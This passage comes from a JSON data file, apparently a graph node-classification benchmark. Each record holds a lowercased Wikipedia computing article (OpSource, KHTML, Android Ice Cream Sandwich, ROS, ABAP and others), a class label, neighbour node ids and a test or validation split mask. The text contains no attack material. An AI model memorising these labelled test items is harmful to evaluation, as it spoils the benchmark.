    "text": "OpSource:opsource opsource inc. cloud managed services hosting company headquartered santa clara california company also offices ashburn virginia ireland india data centers california virginia united kingdom opsource part ict company dimension data acquired opsource 2011 cloud business unit 2002 michael piacente dan rasmussen john rowell treb ryan founded opsource sunnyvale california company initially began provide application support microsoft hotmail product customers 2005 term software service saas becoming popular opsource began focus saas helping isvs focus software development marketing sales part product opsource created saas enablement product helped isvs adobe business objects bmc take product market created saas incubation program small businesses 2006 opsource launched annual saas summit conference held san francisco area since 2010 event renamed cloud presented conjunction software information industry association 2009 opsource released cloud computing service bills utility computing basis opsource received 56.5m funding artiman ventures crosslink capital intel capital key venture partners ntt nippon telegraph telephone corporation velocity mark spagnolo past ceo uunet flag telecom universal access metromedia fiber network chairman board opsource acquired dublin ireland based lecayla technologies 2008 founded 2004 lecayla technologies metering billing services allowed isvs offer software applications utility perpetual licensing hybrid pricing basis june 30 2011 opsource inc. acquired dimension data holdings named steve nola ceo dimension data cloud solutions new division included opsource opsource two main products managed hosting cloud computing managed hosting dedicated hosting service support multiple applications operating systems databases originally called optimal on-demand services designed support software service market opsource offers 100 uptime guarantee customers host applications managed hosting product cloud computing delivered infrastructure service offering cloud computing customers physical infrastructure instead avoiding capital expenditure renting usage third-party provider consume resources service pay resources use utility computing model paying services consumed opsource cloud offers 100 network uptime 1ms intra network latency guarantee opsource cloud product competes similar offerings rackspace amazon ibm service levels receive support via usual means e-mail telephone ticket systems designed fit needs different businesses 2010 always demand top 100 category winner br 2010 top 20 coolest cloud vendors",
    "neighbors": [
      4194,
      6856,
      3819,
      4429,
      4655,
      10194,
      467,
      3323
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3406,
    "label": 3,
    "text": "SVI-728:svi-728 svi-728 first home computer spectravideo complied fully msx home computer specification introduced 1985 design virtually identical earlier sv-328 comply fully msx standard svi-738 portable version computer",
    "neighbors": [
      4257,
      10658,
      1801,
      9006,
      7983,
      1776,
      9998,
      1403,
      9947
    ],
    "mask": "None"
  },
  {
    "node_id": 3407,
    "label": 8,
    "text": "KHTML:khtml khtml browser engine developed kde project engine used konqueror web browser although seen significant development since 2016 still actively maintained engines descended khtml used world widely used browsers among google chrome safari opera vivaldi microsoft edge switch chromium distributed terms gnu lesser general public license khtml free software built kparts framework written c++ khtml relatively good support web standards render many pages possible extra abilities quirks internet explorer also supported even though non-standard khtml preceded earlier engine called khtmlw kde html widget developed torben weis martin jones implemented support html 3.2 http 1.0 html frames w3c dom css scripting khtml came existence november 4 1998 copy khtmlw library slight refactoring addition unicode support changes support move qt 2 waldo bastian among work creating early version khtml real work khtml actually started may october 1999 realization choice facing project either significant effort move khtml forward use mozilla adding support scripting highest priority may 1999 lars knoll began research eye toward implementing w3c dom specification finally announcing august 16 1999 checked amounted complete rewrite khtml library — changing khtml use standard w3c dom internal document representation turn allowed beginnings javascript support added october 1999 integration harri porten kjs following shortly afterwards closing months 1999 first months 2000 knoll work antti koivisto dirk mueller add css support refine stabilize khtml architecture work completed march 2000 among things changes enabled khtml become second browser internet explorer correctly support hebrew arabic languages written right-to-left — mozilla support kde 2.0 first kde release october 23 2000 include khtml rendering engine new konqueror file web browser replaced monolithic kde file manager ksvg first developed 2001 nikolas zimmermann rob buis however 2003 decided fork then-current ksvg implementation two new projects kdom/ksvg2 improve state dom rendering khtml underneath formidable svg 1.0 render state kcanvas abstract rendering done within khtml/ksvg2 single shared library multiple backends e.g. cairo/qt etc. ksvg2 also part webkit following standards supported khtml engine khtml kjs adopted apple 2002 use safari web browser apple publishes source code fork khtml engine called webkit 2013 google began development fork webkit called blink",
    "neighbors": [
      3971,
      3462,
      8584,
      7181,
      7951,
      543,
      6694,
      8621,
      7346,
      438,
      4797,
      3407,
      4048,
      6991,
      4310,
      11223,
      7384,
      2139,
      8923,
      4326,
      487,
      7399,
      5101,
      6257,
      3828,
      6389,
      4728
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3408,
    "label": 9,
    "text": "Phyllis_Fox:phyllis fox phyllis ann fox american mathematician computer scientist fox raised colorado undergraduate studies wellesley college earning b.a mathematics 1944 1944 1946 worked general electric operator differential analyser project earned second baccalaureate b.s electrical engineering university colorado 1948 moved graduate studies massachusetts institute technology earning m.s 1949 electrical engineering doctorate sc.d mathematics 1954 supervision chia-chiao lin time also worked assistant whirlwind project mit jay forrester 1954 1958 fox worked numerical solution partial differential equations univac computing center united states atomic energy commission courant institute mathematical sciences new york university 1958 following husband returned forester system dynamics research group mit became part team wrote dynamo programming language became collaborator first lisp interpreter principal author first lisp manual 1963 moved mit newark college engineering became full professor 1972 time also consulted bell labs moved 1973 work highly portable numerics library port retired bell labs 1984",
    "neighbors": [
      4992,
      10752,
      11269,
      3334,
      5751,
      6919,
      7562,
      2062,
      9231,
      2577,
      1301,
      9749,
      9877,
      8728,
      4633,
      6556,
      3869,
      10012,
      2335,
      6047,
      8226,
      4516,
      5031,
      9128,
      5803,
      3119,
      2225,
      10547,
      11255,
      311,
      2105,
      7867,
      6717,
      4799,
      5569,
      6594,
      8771,
      4550,
      7880,
      8908,
      1613,
      205,
      11218,
      9299,
      10712,
      3034,
      3675,
      11226,
      10463,
      7392,
      7904,
      11488,
      7267,
      10083,
      8293,
      6502,
      2666,
      3051,
      5360,
      5361,
      8435,
      3446,
      1783,
      4985,
      6906,
      7805
    ],
    "mask": "Test"
  },
  {
    "node_id": 3409,
    "label": 2,
    "text": "Android_Ice_Cream_Sandwich:android ice cream sandwich android ice cream sandwich ninth version android mobile operating system developed google unveiled october 19 2011 android 4.0 builds upon significant changes made tablet-only release android honeycomb effort create unified platform smartphones tablets android 4.0 focused simplifying modernizing overall android experience around new set human interface guidelines part efforts introduced new visual appearance codenamed holo built around cleaner minimalist design new default typeface named roboto also introduced number new features including refreshed home screen near-field communication nfc support ability beam content another user using technology updated web browser new contacts manager social network integration ability access camera control music playback lock screen visual voicemail support face recognition device unlocking face unlock ability monitor limit mobile data usage internal improvements android 4.0 received positive reviews critics praised cleaner revamped appearance operating system comparison previous versions along improved performance functionality however critics still felt android 4.0 stock apps still lacking quality functionality comparison third-party equivalents regarded operating system new features particularly face unlock feature gimmicks statistics issued google indicate 0.3 android devices accessing google play run ice cream sandwich following tablet-only release honeycomb announced google i/o 2011 next version android code named ice cream sandwich ics would emphasized providing unified user experience smartphones tablets june 2011 details also began surface surrounding new nexus phone samsung accompany ics would notably exclude hardware navigation keys android blog rootzwiki released photos august 2011 showing nexus running build ics depicting new application menu layout resembling honeycomb new interface blue-colored accenting official launch event android 4.0 new nexus phone originally scheduled october 11 2011 ctia trade show san diego however respect death apple co-founder steve jobs google samsung postponed event october 19 2011 hong kong android 4.0 launch device galaxy nexus officially unveiled october 19 2011 andy rubin explained 4.0 intended provide enticing intuitive user experience across smartphones tablets matias duarte google vice president design explained development ice cream sandwich based around question soul new machine user studies concluded existing android interface complicated thus prevented users empowered devices overall visual appearance android streamlined ice cream sandwich building upon changes made tablet-oriented android 3.0 first project google duarte admitted team cut back support smaller screens honeycomb prioritize sufficient tablet support wanted android oems stop silly things like taking phone ui stretching 10-inch tablet judging android major competitors duarte felt interface ios skeuomorphic kitschy windows phone metro design language looked much like airport lavatory signage operating systems tried hard enforce conformity without leaving room content express ice cream sandwich team aimed provide interface design guidelines would evoke modern appearance still allowing flexibility application developers characterized revised look ice cream sandwich toned geeky nerd quotient comparison honeycomb carried futuristic appearance compared critics aesthetics tron january 2012 following official launch ice cream sandwich duarte google launched android design portal features human interface guidelines best practices resources developers building android apps designed ice cream sandwich galaxy nexus first android device ship android 4.0 android 4.0.3 released december 16 2011 providing bug fixes new social stream api internal improvements day google began rollout ice cream sandwich predecessor galaxy nexus nexus s. however december 20 2011 nexus roll-out paused company could monitor feedback related update march 29 2012 android 4.0.4 released promising performance improvements camera screen rotation bug fixes google play services support 4.0 ended february 2019 user interface android4.0 represents evolution design introduced honeycomb although futuristic aesthetics honeycomb scaled back favor flatter cleaner feel neon blue accenting hard edges drop shadows depth ice cream sandwich also introduces new default system font roboto designed in-house replace droid font family roboto primarily optimized use high-resolution mobile displays new visual appearance ice cream sandwich implemented widget toolkit known holo ensure access holo style across devices—even use customized interface skin elsewhere android devices certified ship google play store formerly android market must provide capability apps use unmodified holo theme honeycomb devices render navigation buttons— back home recent apps —on system bar across bottom screen removing need physical equivalents menu button present previous generations android devices deprecated favor presenting buttons actions within apps action bars menu items fit bar action overflow menus designated three vertical dots hardware search buttons also deprecated favor search buttons within action bars devices without menu key temporary menu key displayed on-screen running apps coded support new navigation scheme devices use hardware menu key action overflow buttons hidden apps mapped menu key default home screen ice cream sandwich displays persistent google search bar across top screen dock across bottom containing app drawer button middle four slots app shortcuts alongside folders apps formed dragging app hovering another app drawer split two tabs one apps latter holding widgets placed home screen pages widgets resizable contain scrolling content android4.0 contains increased use swiping gestures apps notifications removed recent apps menu dismissed notifications area sliding away number stock google apps use new form tabs users navigate different panes either tapping name strip swiping left right phone app updated holo design ability send pre-configured text message responses response incoming calls visual voicemail integration within call log display web browser app incorporates updated versions webkit v8 supports syncing google chrome override mode loading desktop-oriented version website rather mobile-oriented version well offline browsing contacts section phone app split new people app offers integration social networks google+ display recent posts synchronize contacts profile device user camera app redesigned reduction shutter lag face detection new panorama mode ability take still photos video recorded camcorder mode photo gallery app contains basic photo editing tools lock screen supports face unlock includes shortcut launching camera app house playback controls music players keyboard incorporates improved autocomplete algorithms improvements voice input allow continuous dictation ability take screenshots holding power volume buttons together also added devices supporting near-field communication nfc android beam allows users share links content compatible apps holding back device back another nfc-equipped android device tapping screen prompted certain system apps particularly pre-loaded carriers uninstalled disabled hides application prevents launching application removed storage android4.0 introduced features managing data usage mobile networks users display total amount data used period time display data usage per-app background data usage disabled globally per-app basis cap set automatically disable data usage reaches certain quota calculated device android 4.0 inherits platform additions honeycomb also adds support ambient temperature humidity sensors bluetooth health device profile near-field communication nfc wi-fi direct operating system also provides improved support stylus mouse input along new accessibility calendar keychain spell checking social networking virtual private network apis multimedia support android4.0 also adds support adts aac matroska containers vorbis vp8 webp streaming vp8 openmax al http live streaming 3.0 android4.0 released positive reception ars technica praised holo user interface sense identity visual coherence previously lacking comparison previous versions android also believing new interface style could help improve quality third-party apps stock apps android4.0 also praised slightly better functionality comparison previous versions features noted improvements text voice input along data usage controls especially given increasing use metered data plans overall performance improvements comparison gingerbread however face unlock feature panned insecure gimmick although providing improved experience previous version stock applications email client panned still inferior third-party alternatives engadget also acknowledged maturing quality android experience ice cream sandwich praised modern feel new interface comparison android 2.3 along new features provided google stock apps operating system conclusion engadget felt android4.0 gorgeous os offers great performance and—for part—does n't feel like half-baked effort however engadget still felt android4.0 new features face unlock beta feel noted lack facebook integration new people app operating system still intuitive new users competitors pc magazine acknowledged influence windows phone 7 new people app improved benchmark performance web browser considered android beam face unlock gimmicks criticized lack support certain apps adobe flash launch",
    "neighbors": [
      5637,
      8719,
      3600,
      7700,
      9244,
      11294,
      1578,
      10284,
      5677,
      1083,
      6212,
      69,
      2630,
      8262,
      4683,
      4685,
      11343,
      3664,
      8280,
      8285,
      2658,
      5749,
      8821,
      11391,
      2179,
      1670,
      7816,
      5262,
      10393,
      8858,
      7835,
      673,
      8870,
      1191,
      1203,
      7359,
      196,
      3269,
      3782,
      8907,
      2258,
      2259,
      3795,
      1240,
      8413,
      9949,
      6367,
      1255,
      2282,
      236,
      8940,
      9970,
      3836,
      5892,
      7428,
      2828,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      4901,
      8486,
      10537,
      3380,
      5431,
      2875,
      3900,
      10045,
      11590,
      11082,
      332,
      8019,
      2901,
      5467,
      5470,
      3940,
      5483,
      7548,
      1409,
      4995,
      9610,
      10129,
      5522,
      1427,
      5524,
      10645,
      1435,
      2978,
      1959,
      937,
      5546,
      3499,
      6057,
      7595,
      2001,
      5078,
      479,
      487,
      6632,
      1516,
      5100,
      5613,
      9712,
      1011,
      5620,
      11252,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 3410,
    "label": 2,
    "text": "XCOFF:xcoff xcoff extended coff improved expanded version coff object file format defined ibm used aix early versions powerpc macintosh also supported xcoff beos xcoff additions include use csects provide subsection granularity cross-references use stabs debugging information handling shared libraries also elaborate plain coff recently ibm defined xcoff64 version supporting 64-bit aix used xcoff32 mean original file format",
    "neighbors": [
      10176,
      1922,
      8037,
      4712,
      6664,
      6921,
      2672,
      2804,
      5492,
      5557,
      8700,
      3386,
      3323,
      3324,
      2942,
      8959
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3411,
    "label": 4,
    "text": "Alexander_Petrov_(hacker):alexander petrov hacker alexander petrov two men responsible ddos hire extortion multinational law enforcement group british american russian private individuals law enforcement agents captured alexander petrov two accomplices ivan maksakov denis stepanov three heading extortion ring extorting money various online services e.g banks internet casinos web based businesses reportedly damages caused ring millions dollars range october 8 2007 petrov maksakov stenanov found guilty sentenced eight years prison russian federation 100,000 ruble penalty",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 3412,
    "label": 2,
    "text": "Robot_Operating_System:robot operating system robot operating system ros ros robotics middleware i.e collection software frameworks robot software development although ros operating system provides services designed heterogeneous computer cluster hardware abstraction low-level device control implementation commonly used functionality message-passing processes package management running sets ros-based processes represented graph architecture processing takes place nodes may receive post multiplex sensor data control state planning actuator messages despite importance reactivity low latency robot control ros real-time os rtos possible however integrate ros real-time code lack support real-time systems addressed creation ros 2.0 major revision ros api take advantage modern libraries technologies core ros functionality add support real-time code embedded hardware software ros ecosystem separated three groups language-independent tools main client libraries c++ python lisp released terms bsd license open source software free commercial research use majority packages licensed variety open source licenses packages implement commonly used functionality applications hardware drivers robot models datatypes planning perception simultaneous localization mapping simulation tools algorithms main ros client libraries geared toward unix-like system primarily dependence large collections open-source software dependencies client libraries ubuntu linux listed supported variants fedora linux macos microsoft windows designated experimental supported community native java ros client library rosjava however share limitations enabled ros-based software written android os rosjava also enabled ros integrated officially supported matlab toolbox used linux macos microsoft windows javascript client library roslibjs also developed enables integration software ros system via standards-compliant web browser sometime 2007 first pieces eventually would become ros beginning come together stanford university eric berger keenan wyrobek phd students working kenneth sailsbury robotics laboratory stanford leading personal robotics program working robots manipulation tasks human environments two students noticed many colleagues held back diverse nature robotics excellent software developer might hardware knowledge required someone developing state art path planning might know computer vision required attempt remedy situation two students set make baseline system would provide starting place others academia build upon words eric berger “ something ’ suck different dimensions ” first steps towards unifying system two build pr1 hardware prototype began work software borrowing best practices early open source robotic software frameworks particularly switchyard system morgan quigley another stanford phd student working support stair stanford artificial intelligence robot stanford artificial intelligence laboratory early funding us 50,000 provided joanna hoffman alain rossmann supported development pr1 seeking funding development eric berger keenan wyrobek met scott hassan founder willow garage technology incubator working autonomous suv solar autonomous boat hassan shared berger wyrobek vision “ linux robotics ” invited come work willow garage willow garage started january 2007 first commit ros code made sourceforge seventh november 2007 willow garage began developing pr2 robot follow-up pr1 ros software run groups twenty institutions made contributions ros core software growing number packages worked ros form greater software ecosystem fact people outside willow contributing ros particularly stanford stair project meant ros multi-robot platform beginning willow garage originally projects progress scrapped favor personal robotics program focused producing pr2 research platform academia ros open source robotics stack would underlie academic research tech startups much like lamp stack web-based startups december 2008 willow garage met first three internal milestones continuous navigation pr2 period two days distance pi kilometers soon early version ros 0.4 mango tango released followed first rviz documentation first paper ros early summer second internal milestone pr2 navigate office open doors plug reached followed august initiation ros.org website early tutorials ros posted december preparing release ros 1.0 january 2010 milestone 3 producing tons documentation tutorials enormous capabilities willow garage engineers developed preceding 3 years following willow garage achieved one longest held goals giving away 10 pr2 robots worthy academic institutions long goal founders felt pr2 could kick-start robotics research around world ended awarding eleven pr2s different institutions including university freiburg germany bosch georgia tech ku leuven belgium mit stanford tu munich germany uc berkeley u penn usc university tokyo japan combined willow garage highly successful internship program run 2008 2010 melonee wise helped spread word ros throughout robotics world first official ros distribution release ros box turtle released march 2nd 2010 marking first time ros official distributed set versioned packages public use developments lead first drone running ros first autonomous car running ros adaption ros lego mindstorms pr2 beta program well underway pr2 robot officially released commercial purchase september 9th 2010 2011 banner year ros launch ros answers q/a forum ros users february 15th introduction highly successful turtlebot robot kit april 18th total number ros repositories passing 100 may 5th willow garage began 2012 creating open source robotics foundation osrf april osrf immediately awarded software contract darpa later year first roscon held st. paul mn first book ros ros example published baxter first commercial robot run ros announced rethink robotics soon passing fifth anniversary november ros began running every continent december 3rd 2012 february 2013 osrf became primary software maintainers ros foreshadowing announcement august willow garage would absorbed founders suitable technologies point ros released seven major versions ros groovy users globe chapter ros development would finalized clearpath robotics took support responsibilities pr2 early 2014 years since osrf took primary development ros new version released every year interest ros continues grow roscons occurred every year since 2012 co-located either icra iros two flagship robotics conferences meetups ros developers organized variety countries number ros books published many educational programs initiated september 1st 2014 nasa announced first robot run ros space robotnaut 2 international space station 2017 osrf changed name open robotics tech giants amazon microsoft began take interest ros time microsoft porting core ros windows september 2018 followed amazon web services releasing robomaker november perhaps important development osrf/open robotics years thus far discount explosion robot platforms began support ros enormous improvements ros version proposal ros2 significant api change ros intended support real time programming wider variety computing environments utilize modern technology ros2 announced roscon 2014 first commits ros2 repository made february 2015 followed alpha releases august 2015 first distribution release ros2 ardent apalone released december 8th 2017 ushering new era next-generation ros development ros designed open-source mind intending users would able choose configuration tools libraries interacted core ros users could shift software stacks fit robot application area little actually core ros beyond general structure within programs must exist communicate one sense ros underlying plumbing behind nodes message passing however reality ros plumbing rich mature set tools wide-ranging set robot-agnostic capabilities provided packages greater ecosystem additions ros ros processes represented nodes graph structure connected edges called topics ros nodes pass messages one another topics make service calls nodes provide service nodes set retrieve shared data communal database called parameter server process called ros master makes possible registering nodes setting node-to-node communication topics controlling parameter server updates messages service calls pass master rather master sets peer-to-peer communication node processes register master decentralized architecture lends well robots often consist subset networked computer hardware may communicate off-board computers heavy computation commands node represents single process running ros graph every node name registers ros master take actions multiple nodes different names exist different namespaces node defined anonymous case randomly generate additional identifier add given name nodes center ros programming ros client code form ros node takes actions based information received nodes sends information nodes sends receives requests actions nodes topics named buses nodes send receive messages topic names must unique within namespace well send messages topic node must publish said topic receive messages must subscribe publish/subscribe model anonymous node knows nodes sending receiving topic sending/receiving topic types messages passed topic vary widely user-defined content messages sensor data motor control commands state information actuator commands anything else node may also advertise services service represents action node take single result services often used actions defined beginning end capturing single-frame image rather processing velocity commands wheel motor odometer data wheel encoder nodes advertise services call services one another parameter server database shared nodes allows communal access static semi-static information data change frequently infrequently accessed distance two fixed points environment weight robot good candidates storage parameter server ros core functionality augmented variety tools allow developers visualize record data easily navigate ros package structures create scripts automating complex configuration setup processes addition tools greatly increases capabilities systems using ros simplifying providing solutions number common robotics development tools provided packages like algorithm rather providing implementations hardware drivers algorithms various robotic tasks packages provide task robot-agnostic tools come core modern ros installations rviz three-dimensional visualizer used visualize robots environments work sensor data highly configurable tool many different types visualizations plugins rosbag command line tool used record playback ros message data rosbag uses file format called bags log ros messages listening topics recording messages come playing messages back bag largely original nodes produced data ros computation graph making bags useful tool recording data used later development rosbag command line tool rqt_bag provides gui interface rosbag catkin ros build system replaced rosbuild ros groovy catkin based cmake similarly cross-platform open source language-independent rosbash package provides suite tools augment functionality bash shell tools include rosls roscd roscp replicate functionalities ls cd cp respectively ros versions tools allow users use ros package names place filepath package located package also adds tab-completion ros utilities includes rosed edits given file chosen default text editor well rosrun runs executes ros packages rosbash supports functionalities zsh tcsh lesser extent roslaunch tool used launch multiple ros nodes locally remotely well setting parameters ros parameter server roslaunch configuration files written using xml easily automate complex startup configuration process single command roslaunch scripts include roslaunch scripts launch nodes specific machines even restart processes die execution ros contains many open source implementations common robotics functionality algorithms open source implementations organized packages many packages included part ros distributions others may developed individuals distributed code sharing sites github packages note include ros releases may incompatible releases often referred code name rather version number ros currently releases version every year may odd numbered years release supported two years even numbered years release designated long-term support release supported five years loosely follows ubuntu release cycle ros2 currently releases new version every six months december july releases supported single year ros-industrial open-source project bsd legacy apache 2.0 preferred license extends advanced capabilities ros manufacturing automation robotics ros-industrial repository includes interfaces common industrial manipulators grippers sensors device networks also provides software libraries automatic 2d/3d sensor calibration process path/motion planning applications like scan-n-plan developer tools like qt creator ros plugin training curriculum specific needs manufacturers ros-i supported international consortium industry research members project began collaborative endeavor yaskawa motoman robotics southwest research institute willow garage support use ros manufacturing automation github repository founded january 2012 shaun edwards swri currently consortium divided three groups ros-industrial consortium americas led swri located san antonio texas ros-industrial consortium europe led fraunhofer ipa located stuttgart germany ros-industrial consortium asia pacific led advanced remanufacturing technology centre artc nanyang technological university ntu located singapore consortia supports global ros-industrial community conducting ros-i training providing technical support setting future roadmap ros-i well conducting pre-competitive joint industry projects develop new ros-i capabilities",
    "neighbors": [
      3462,
      6797,
      11156,
      5397,
      2198,
      9366,
      6554,
      7326,
      10791,
      7983,
      823,
      968,
      6993,
      8921,
      9946,
      479,
      6502,
      8554,
      6128,
      2804,
      10494
    ],
    "mask": "None"
  },
  {
    "node_id": 3413,
    "label": 9,
    "text": "Runtime_system:runtime system runtime system also called run-time system runtime environment run-time environment primarily implements portions execution model confused runtime lifecycle phase program runtime system operation languages form runtime system provides environment programs run environment may address number issues including layout application memory program accesses variables mechanisms passing parameters procedures interfacing operating system otherwise compiler makes assumptions depending specific runtime system generate correct code typically runtime system responsibility setting managing stack heap may include features garbage collection threads dynamic features built language every programming language specifies execution model many implement least part model runtime system one possible definition runtime system behavior among others behavior directly attributable program definition includes part runtime system things putting parameters onto stack function call behavior disk i/o parallel execution related behaviors definition essentially every language runtime system including compiled languages interpreted languages embedded domain-specific languages even api invoked stand alone execution models pthreads runtime system implementation execution model behavior scholarly papers runtime systems focus implementation details parallel runtime systems notable example parallel runtime system cilk popular parallel programming model addition proto-runtime toolkit created simplify creation parallel runtime systems addition execution model behavior runtime system may also perform support services type checking debugging code generation optimization runtime system also gateway running program interacts runtime environment contains state values accessible program execution also active entities interacted program execution like disk drives people via keyboards example environment variables features many operating systems part runtime environment running program access via runtime system likewise hardware devices dvd drive active entities program interact via runtime system unique application runtime environment rte within operating system os allows rte run meaning boot power-down entire os dedicated application running within rte code tries run failures application break rte breaks os stops processing requires re-boot boot read-only memory extremely secure simple single-mission system created simple example basic runtime system runtime system c language particular set instructions inserted executable image compiler among things instructions manage processor stack create space local variables copy function-call parameters onto top stack often clear criteria deciding language behavior considered inside runtime system versus behavior part source program c setup stack part runtime system opposed part semantics individual program maintains global invariant holds executions systematic behavior implements execution model language opposed implementing semantics particular program text directly translated code computes results one way observe separation semantics particular program runtime environment compile program object file containing functions versus compiling entire program executable binary object file contain assembly code relevant functions executable binary contain additional code used implement runtime environment object file one hand may missing information runtime environment resolved linking hand code object file still depends assumptions runtime system example function may read parameters particular register stack location depending calling convention used runtime environment another example case using application programming interface api interact runtime system calls api look calls regular software library however point call execution model changes runtime system implements execution model different language library written terms person reading code normal library would able understand library behavior knowing language library written however person reading code api invokes runtime system would able understand behavior api call knowing language call written point via mechanism execution model stops language call written switches execution model implemented runtime system example trap instruction one method switching execution models difference distinguishes api-invoked execution model posix threads usual software library posix threads calls software library calls invoked via api posix threads behavior understood terms language call rather posix threads calls bring play outside execution model implemented posix threads runtime system runtime system often os kernel extreme example physical cpu viewed implementation runtime system specific assembly language view execution model implemented physical cpu memory systems analogy runtime systems higher-level languages implemented using languages creates hierarchy runtime systems cpu itself—or actually logic microcode layer below—acting lowest-level runtime system compiled interpreted languages provide interface allows application code interact directly runtime system example codice_1 class java language class allows code animated one thread things start stop threads normally core aspects language behavior task scheduling resource management accessible fashion higher-level behaviors implemented runtime system may include tasks drawing text screen making internet connection often case operating systems provide kinds behaviors well available runtime system implemented abstraction layer translates invocation runtime system invocation operating system hides complexity variations services offered different operating systems also implies os kernel viewed runtime system set os calls invoke os behaviors may viewed interactions runtime system limit runtime system may provide services p-code machine virtual machine hide even processor instruction set approach followed many interpreted languages awk languages like java meant compiled machine-independent intermediate representation code bytecode arrangement simplifies task language implementation adaptation different machines improves efficiency sophisticated language features reflection also allows program executed machine without explicit recompiling step feature become important since proliferation world wide web speed execution runtime systems feature just-in-time compilation machine code modern aspect runtime systems parallel execution behaviors behaviors exhibited mutex constructs pthreads parallel section constructs openmp runtime system parallel execution behaviors may modularized according proto-runtime approach notable early examples runtime systems interpreters basic lisp environments also included garbage collector forth early example language designed compiled intermediate representation code runtime system virtual machine interpreted code another popular theoretical example donald knuth mix computer c later languages supported dynamic memory allocation runtime system also included library managed program memory pool object-oriented programming languages runtime system often also responsible dynamic type checking resolving method references",
    "neighbors": [
      515,
      7173,
      6664,
      4112,
      3603,
      9749,
      3613,
      31,
      5154,
      10282,
      5677,
      7739,
      60,
      2620,
      8258,
      7753,
      3665,
      8280,
      1632,
      7273,
      2666,
      8301,
      119,
      6778,
      5260,
      4255,
      8868,
      1703,
      7847,
      7341,
      6837,
      716,
      8908,
      214,
      9432,
      9434,
      1253,
      10470,
      2798,
      5872,
      242,
      2808,
      2811,
      7421,
      6910,
      9981,
      2304,
      4865,
      6403,
      9490,
      5395,
      2327,
      10013,
      5921,
      7462,
      11559,
      9002,
      814,
      7983,
      823,
      6969,
      3386,
      10559,
      3904,
      5952,
      6477,
      339,
      1365,
      2392,
      7523,
      8037,
      6502,
      7018,
      10097,
      1399,
      1409,
      3969,
      8071,
      1952,
      8609,
      1448,
      5041,
      10703,
      5585,
      477,
      7645,
      3553,
      8680,
      8171,
      9714,
      3067,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 3414,
    "label": 9,
    "text": "ABAP:abap abap advanced business application programming originally allgemeiner berichts-aufbereitungs-prozessor german general report creation processor high-level programming language created german software company sap se currently positioned alongside java language programming sap netweaver application server part sap netweaver platform building business applications abap one many application-specific fourth-generation languages 4gls first developed 1980s originally report language sap r/2 platform enabled large corporations build mainframe business applications materials management financial management accounting.abap establish integration independent softwares abap used abbreviation allgemeiner berichts-aufbereitungs-prozessor german generic report preparation processor later renamed english advanced business application programming abap one first languages include concept logical databases ldbs provides high level abstraction basic database level supports every platform language units abap language originally used developers develop sap r/3 platform also intended used sap customers enhance sap applications – customers develop custom reports interfaces abap programming language geared towards technical customers programming experience extracted base computing languages java c c++ python abap remains language creating programs client-server r/3 system sap first released 1992 computer hardware evolved 1990s sap applications systems written abap 2001 basic functions written abap 1999 sap released object-oriented extension abap called abap objects along r/3 release 4.6 sap current development platform netweaver supports abap java abap abstraction business applications operating system database ensures applications depend directly upon specific server database platform easily ported one platform another sap netweaver currently runs unix aix hp-ux solaris linux microsoft windows i5/os ibm system formerly iseries as/400 z/os ibm system z formerly zseries s/390 supported databases hana sap ase formerly sybase ibm db2 informix maxdb oracle microsoft sql server support informix discontinued sap basis release 7.00 abap programs reside inside sap database stored separate external files like java c++ programs database abap code exists two forms source code viewed edited abap workbench tools generated code binary representation somewhat comparable java bytecode abap programs execute control runtime system part sap kernel runtime system responsible processing abap statements controlling flow logic screens responding events user clicking screen button respect seen virtual machine comparable java vm key component abap runtime system database interface turns database-independent abap statements open sql statements understood underlying dbms native sql database interface handles communication relational database behalf abap programs also contains extra features buffering tables frequently accessed data local memory application server sap data exists sap software runs context sap system system consists central relational database one application instances accessing data programs database sap system contains least one instance may contain mostly reasons sizing performance system multiple instances load balancing mechanisms ensure load spread evenly available application servers installations web application server landscapes typically consist three systems one development one testing quality assurance one production landscape may contain systems e.g. separate systems unit testing pre-production testing may contain fewer e.g. development production without separate qa nevertheless three common configuration abap programs created undergo first testing development system afterwards distributed systems landscape actions take place control change transport system cts responsible concurrency control e.g. preventing two developers changing code time version management deployment programs qa production systems web application server consists three layers database layer application layer presentation layer layers may run different physical machines database layer contains relational database database software application layer knowledge contains instance instances system application processes including business transactions abap development run application layer presentation layer handles interaction users system online access abap application servers go via proprietary graphical interface called sap gui via web browser abap software deployed software components examples transaction sap terminology execution program normal way executing abap code sap system entering transaction code instance va01 transaction code create sales order transactions called via system-defined user-specific role-based menus also started entering transaction code directly command field present every sap screen transactions also invoked programmatically means abap statements call transaction leave transaction general notion transaction called logical unit work luw sap terminology short form transaction code t-code programming languages abap program either executable unit library provides reusable code programs independently executable abap distinguishes two types executable programs reports follow relatively simple programming model whereby user optionally enters set parameters e.g. selection subset data program uses input parameters produce report form interactive list term report somewhat misleading reports also designed modify data reason programs called reports list-oriented nature output produce module pools define complex patterns user interaction using collection screens term “ screen ” refers actual physical image user sees screen also flow logic refers abap code implicitly invoked screens divided pbo process output pai process input section sap documentation term “ dynpro ” dynamic program refers combination screen flow logic non-executable program types include module gets included generation time calling unit often used subdivide large programs br subroutine pools contain abap subroutines blocks code enclosed form/endform statements invoked perform br function groups libraries self-contained function modules enclosed function/endfunction invoked call function br object classes interfaces similar java classes interfaces first define set methods attributes second contain empty method definitions class implementing interface must provide explicit code br type pools define collections data types constants abap programs composed individual sentences statements first word statement called abap keyword statement ends period words must always separated least one space statements indented wish keywords additions operands abap runtime system differentiate upper lowercase statements extend beyond one line several statements single line though recommended lines begin asterisk first column recognized comment lines abap runtime system ignored double quotations marks indicate remainder line comment two possible ways develop abap availability depends release abap system abap workbench part abap system accessed via sapgui contains different tools editing programs important transaction codes shown parentheses object navigator transaction se80 provides single integrated interface various tools abap development tools adt formally known abap eclipse set plugins eclipse platform develop abap scenario abap developer installs required tools computer works locally whereas continuous synchronization backend performed abap dictionary contains metadata data sap system closely linked abap workbench reference data e.g. table view data type obtained dictionary developers use abap dictionary transactions directly se80 object navigator inside abap workbench display maintain metadata dictionary object changed program references changed object automatically reference new version next time program runs abap interpreted necessary recompile programs reference changed dictionary objects brief description important types dictionary objects follows brief description abap syntax begins ubiquitous hello world program report test write 'hello world example contains two statements codice_1 codice_2 program displays list screen case list consists single line hello world codice_1 statement indicates program report program could module pool replacing codice_1 statement codice_5 consecutive statements identical first leftmost part combined chained statement using 